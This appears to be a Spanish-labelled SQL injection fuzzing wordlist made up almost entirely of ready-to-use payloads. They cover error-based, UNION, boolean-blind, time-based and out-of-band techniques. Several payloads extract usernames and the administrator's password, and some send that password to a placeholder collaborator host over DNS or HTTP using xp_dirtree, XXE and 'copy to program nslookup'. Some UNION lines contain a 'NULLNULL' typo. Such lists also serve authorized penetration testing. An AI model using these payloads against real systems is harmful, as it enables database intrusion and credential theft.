Fuzzing Básico
# Detectar inyecciones SQL
"
''
'
' --
' /*
' #
' or 1=1 --
' or 1=1 /*
' or 1=1 #
'||(SELECT '')||'
'||(SELECT '' FROM dual)||'
# Detectar inyecciones SQL en banda basadas en errores
' AND CAST((SELECT 1) AS int) --
' AND CAST((SELECT 1 FROM DUAL) AS INTEGER) --
' AND CAST((SELECT 1) AS int) #
' AND 1=CAST((SELECT 1) AS int) --
' AND 1=CAST((SELECT 1 FROM DUAL) AS INTEGER) --
' AND 1=CAST((SELECT 1) AS int) #
' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int) --
' AND 1=CAST((SELECT username FROM users WHERE ROWNUM=1) AS NUMBER) --
' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int) #
' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int) --
' AND 1=CAST((SELECT password FROM users WHERE ROWNUM=1) AS NUMBER) --
' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int) #
# Detectar inyecciones SQL en banda basadas en UNION SELECT
' ORDER BY 1 --
' ORDER BY 2 --
' ORDER BY 3 --
' ORDER BY 4 --
' ORDER BY 5 --
' ORDER BY 6 --
' ORDER BY 7 --
' ORDER BY 8 --
' ORDER BY 9 --
' ORDER BY 10 --
' ORDER BY 11 --
' ORDER BY 12 --
' ORDER BY 13 --
' ORDER BY 14 --
' ORDER BY 15 --
' ORDER BY 16 --
' ORDER BY 17 --
' ORDER BY 18 --
' ORDER BY 19 --
' ORDER BY 20 --
' ORDER BY 1 #
' ORDER BY 2 #
' ORDER BY 3 #
' ORDER BY 4 #
' ORDER BY 5 #
' ORDER BY 6 #
' ORDER BY 7 #
' ORDER BY 8 #
' ORDER BY 9 #
' ORDER BY 10 #
' ORDER BY 11 #
' ORDER BY 12 #
' ORDER BY 13 #
' ORDER BY 14 #
' ORDER BY 15 #
' ORDER BY 16 #
' ORDER BY 17 #
' ORDER BY 18 #
' ORDER BY 19 #
' ORDER BY 20 #
' UNION SELECT NULL --
' UNION SELECT NULL,NULL --
' UNION SELECT NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL --
' UNION SELECT NULL FROM DUAL --
' UNION SELECT NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --
' UNION SELECT NULL #
' UNION SELECT NULL,NULL #
' UNION SELECT NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL #
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULLNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL #
# Detectar inyecciones SQL ciegas basadas en condicionales
' AND '1'='1
' AND '1'='2
' AND '1'='1' --
' AND '1'='2' --
' AND '1'='1' /*
' AND '1'='2' /*
' AND '1'='1' #
' AND '1'='2' #
' OR '1'='1
' OR '1'='2
' OR '1'='1' --
' OR '1'='2' --
' OR '1'='1' /*
' OR '1'='2' /*
' OR '1'='1' #
' OR '1'='2' #
# Detectar inyecciones SQL ciegas basadas en errores condicionales
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE NULL END)
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE NULL END)
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE NULL END) --
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE NULL END) --
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE NULL END) /*
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE NULL END) /*
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE NULL END) #
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE NULL END) #
' AND (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE NULL END FROM DUAL)
' AND (SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE NULL END FROM DUAL)
' AND (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE NULL END FROM DUAL) --
' AND (SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE NULL END FROM DUAL) --
' AND 1=(SELECT CASE WHEN (1=1) THEN 1/(SELECT 0) ELSE NULL END)
' AND 1=(SELECT CASE WHEN (1=2) THEN 1/(SELECT 0) ELSE NULL END)
' AND 1=(SELECT CASE WHEN (1=1) THEN 1/(SELECT 0) ELSE NULL END) --
' AND 1=(SELECT CASE WHEN (1=2) THEN 1/(SELECT 0) ELSE NULL END) --
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a' --
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a' --
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a' /*
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a' /*
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a' #
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a' #
' AND (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE 'a' END FROM DUAL)='a
' AND (SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE 'a' END FROM DUAL)='a
' AND (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE 'a' END FROM DUAL)='a' --
' AND (SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE 'a' END FROM DUAL)='a' --
' ||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
' ||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
' AND CASE WHEN (1=1) THEN 1/0 ELSE 1 END = 1
' AND CASE WHEN (1=2) THEN 1/0 ELSE 1 END = 1
' AND CASE WHEN (1=1) THEN 1/0 ELSE 1 END = 1 --
' AND CASE WHEN (1=2) THEN 1/0 ELSE 1 END = 1 --
' AND CASE WHEN (1=1) THEN 1/0 ELSE 1 END = 1 /*
' AND CASE WHEN (1=2) THEN 1/0 ELSE 1 END = 1 /*
' AND CASE WHEN (1=1) THEN 1/0 ELSE 1 END = 1 #
' AND CASE WHEN (1=2) THEN 1/0 ELSE 1 END = 1 #
' AND SELECT IF(1=1,(SELECT table_name FROM information_schema.tables),'a')
' AND SELECT IF(1=2,(SELECT table_name FROM information_schema.tables),'a')
' AND SELECT IF(1=1,(SELECT table_name FROM information_schema.tables),'a') #
' AND SELECT IF(1=2,(SELECT table_name FROM information_schema.tables),'a') #
' AND IF(1=1, 1/0, 1) = 1
' AND IF(1=2, 1/0, 1) = 1
' AND IF(1=1, 1/0, 1) = 1 --
' AND IF(1=2, 1/0, 1) = 1 --
' AND IF(1=1, 1/0, 1) = 1 /*
' AND IF(1=2, 1/0, 1) = 1 /*
' AND IF(1=1, 1/0, 1) = 1 #
' AND IF(1=2, 1/0, 1) = 1 #
# Detectar inyecciones SQL ciegas basadas en tiempo
'; IF (1=1) WAITFOR DELAY '0:0:10' --
'; IF (1=2) WAITFOR DELAY '0:0:10' --
'; SELECT CASE WHEN (1=1) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual --
'; SELECT CASE WHEN (1=2) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual --
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END --
'; SELECT CASE WHEN (1=2) THEN pg_sleep(10) ELSE pg_sleep(0) END --
' ||pg_sleep(10) --
'; SELECT IF(1=1,SLEEP(10),'a') #
'; SELECT IF(1=2,SLEEP(10),'a') #
# Detectar inyecciones fuera de banda OAST
'; exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a' --
'; SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual --
'; SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN') --
'; copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN' --
'; LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a') #
'; SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a' #
'; declare @p varchar(1024);set @p=(SELECT password FROM users WHERE username='administrator');exec('master..xp_dirtree "//'+@p+'.BURP-COLLABORATOR-SUBDOMAIN/a"') --
'; SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual --
'; create OR replace function f() returns void as $$ declare c text;declare p text;begin SELECT into p (SELECT password FROM users WHERE username='administrator');c := 'copy (SELECT '''') to program ''nslookup '||p||' BURP-COLLABORATOR-SUBDOMAIN''';execute c;END;$$ language plpgsql security definer;SELECT f(); --
'; SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a' #
'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual+--
'+UNION+SELECT+UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN')+--
'+exec+master..xp_dirtree+'//BURP-COLLABORATOR-SUBDOMAIN/a'+--
'%3b+exec+master..xp_dirtree+'//BURP-COLLABORATOR-SUBDOMAIN/a'+--
'%3b+copy+(SELECT+'')+to+program+'nslookup+BURP-COLLABORATOR-SUBDOMAIN'+--
'+copy+(SELECT+'')+to+program+'nslookup+BURP-COLLABORATOR-SUBDOMAIN'+--
'+LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a')+#+
'%3b+LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a')+#+
'+UNION+SELECT+...+INTO+OUTFILE+'\\\\BURP-COLLABORATOR-SUBDOMAIN\a'+#
'%3b+UNION+SELECT+...+INTO+OUTFILE+'\\\\BURP-COLLABORATOR-SUBDOMAIN\a'+#